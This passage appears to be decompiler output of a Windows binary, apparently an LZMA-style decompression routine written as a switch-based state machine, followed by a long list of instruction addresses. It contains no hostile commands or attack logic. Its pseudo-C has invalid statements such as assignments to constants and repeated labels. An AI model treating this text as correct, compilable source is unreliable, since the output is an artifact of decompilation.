													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                                                                    0x00000000
                                                                                                                    0x00406591
                                                                                                                    0x00406591
                                                                                                                    0x00406595
                                                                                                                    0x004065a2
                                                                                                                    0x004065ac
                                                                                                                    0x00000000
                                                                                                                    0x00406597
                                                                                                                    0x00406597
                                                                                                                    0x004065d2
                                                                                                                    0x004065d5
                                                                                                                    0x004065d8
                                                                                                                    0x004065db
                                                                                                                    0x004065db
                                                                                                                    0x004065de
                                                                                                                    0x004065e5
                                                                                                                    0x004065ea
                                                                                                                    0x004064cb
                                                                                                                    0x004064ce
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406849
                                                                                                                    0x0040684f
                                                                                                                    0x00406855
                                                                                                                    0x0040686f
                                                                                                                    0x00406872
                                                                                                                    0x00406878
                                                                                                                    0x00406883
                                                                                                                    0x00406885
                                                                                                                    0x00406857
                                                                                                                    0x00406857
                                                                                                                    0x00406866
                                                                                                                    0x0040686a
                                                                                                                    0x0040686a
                                                                                                                    0x0040688f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406891
                                                                                                                    0x00406895
                                                                                                                    0x00406a44
                                                                                                                    0x00406a5a
                                                                                                                    0x00406a62
                                                                                                                    0x00406a69
                                                                                                                    0x00406a6b
                                                                                                                    0x00406a72
                                                                                                                    0x00406a76
                                                                                                                    0x00406a76
                                                                                                                    0x004068a1
                                                                                                                    0x004068a8
                                                                                                                    0x004068b0
                                                                                                                    0x004068b3
                                                                                                                    0x004068b6
                                                                                                                    0x004068b6
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00406058
                                                                                                                    0x00406058
                                                                                                                    0x00406058
                                                                                                                    0x00406061
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067
                                                                                                                    0x00000000
                                                                                                                    0x00406072
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040607b
                                                                                                                    0x0040607e
                                                                                                                    0x00406081
                                                                                                                    0x00406085
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040608b
                                                                                                                    0x0040608e
                                                                                                                    0x00406090
                                                                                                                    0x00406091
                                                                                                                    0x00406094
                                                                                                                    0x00406096
                                                                                                                    0x00406097
                                                                                                                    0x00406099
                                                                                                                    0x0040609c
                                                                                                                    0x004060a1
                                                                                                                    0x004060a6
                                                                                                                    0x004060af
                                                                                                                    0x004060c2
                                                                                                                    0x004060c5
                                                                                                                    0x004060d1
                                                                                                                    0x004060f9
                                                                                                                    0x004060fb
                                                                                                                    0x00406109
                                                                                                                    0x00406109
                                                                                                                    0x0040610d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060fd
                                                                                                                    0x00406100
                                                                                                                    0x00406101
                                                                                                                    0x00406101
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060d7
                                                                                                                    0x004060dc
                                                                                                                    0x004060dc
                                                                                                                    0x004060e5
                                                                                                                    0x004060ed
                                                                                                                    0x004060f0
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x00406113
                                                                                                                    0x00406113
                                                                                                                    0x00406117
                                                                                                                    0x004069c3
                                                                                                                    0x00000000
                                                                                                                    0x004069c3
                                                                                                                    0x00406120
                                                                                                                    0x00406130
                                                                                                                    0x00406133
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406139
                                                                                                                    0x0040613d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040613f
                                                                                                                    0x00406145
                                                                                                                    0x0040616f
                                                                                                                    0x00406175
                                                                                                                    0x0040617c
                                                                                                                    0x00000000
                                                                                                                    0x0040617c
                                                                                                                    0x0040614b
                                                                                                                    0x0040614e
                                                                                                                    0x00406153
                                                                                                                    0x00406153
                                                                                                                    0x0040615e
                                                                                                                    0x00406166
                                                                                                                    0x00406169
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061ae
                                                                                                                    0x004061b4
                                                                                                                    0x004061b7
                                                                                                                    0x004061c4
                                                                                                                    0x004061cc
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406183
                                                                                                                    0x00406183
                                                                                                                    0x00406187
                                                                                                                    0x004069d2
                                                                                                                    0x00000000
                                                                                                                    0x004069d2
                                                                                                                    0x00406193
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x004061a1
                                                                                                                    0x004061a4
                                                                                                                    0x004061a7
                                                                                                                    0x004061ac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406849
                                                                                                                    0x0040684f
                                                                                                                    0x00406855
                                                                                                                    0x0040686f
                                                                                                                    0x00406872
                                                                                                                    0x00406878
                                                                                                                    0x00406883
                                                                                                                    0x00406885
                                                                                                                    0x00406857
                                                                                                                    0x00406857
                                                                                                                    0x00406866
                                                                                                                    0x0040686a
                                                                                                                    0x0040686a
                                                                                                                    0x0040688f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061d4
                                                                                                                    0x004061d6
                                                                                                                    0x004061d9
                                                                                                                    0x0040624a
                                                                                                                    0x0040624d
                                                                                                                    0x00406250
                                                                                                                    0x00406257
                                                                                                                    0x00406261
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x004061db
                                                                                                                    0x004061df
                                                                                                                    0x004061e2
                                                                                                                    0x004061e4
                                                                                                                    0x004061e7
                                                                                                                    0x004061ea
                                                                                                                    0x004061ec
                                                                                                                    0x004061ef
                                                                                                                    0x004061f1
                                                                                                                    0x004061f6
                                                                                                                    0x004061f9
                                                                                                                    0x004061fc
                                                                                                                    0x00406200
                                                                                                                    0x00406207
                                                                                                                    0x0040620a
                                                                                                                    0x00406211
                                                                                                                    0x00406215
                                                                                                                    0x0040621d
                                                                                                                    0x0040621d
